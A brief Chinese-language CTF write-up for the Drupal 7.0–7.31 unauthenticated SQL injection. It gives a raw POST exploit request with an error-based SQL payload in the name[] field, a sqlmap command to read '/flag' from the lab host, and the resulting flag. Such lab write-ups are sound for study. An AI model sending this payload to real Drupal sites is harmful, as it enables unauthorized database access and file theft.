Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统和PHP开发框架共同构成,在GPL2.0及更新协议下发布。连续多年全球最佳CMS大奖,是基于PHP的Drupal是一款用量庞大的CMS,其7.0~7.31版本中存在一处修改不需要认证的SQL漏洞。通过该漏洞,攻击者可以执行任意SQL语句,插入、管理员信息,甚至执行任意代码。
exp
POST /?q=node&destination=node HTTP/1.1
Host: eci-2ze0udbz1sckgmy26dy0.cloudeci1.ichunqiu.com
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 122
pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0,concat(0xa,*),0)%23]=bob&name[0]=a
sqlmap
sqlmap -r 1.txt --file-read “/flag” --batch
得到flag
flag{a163b93f-c349-4b7f-a6b2-890a10db61c4}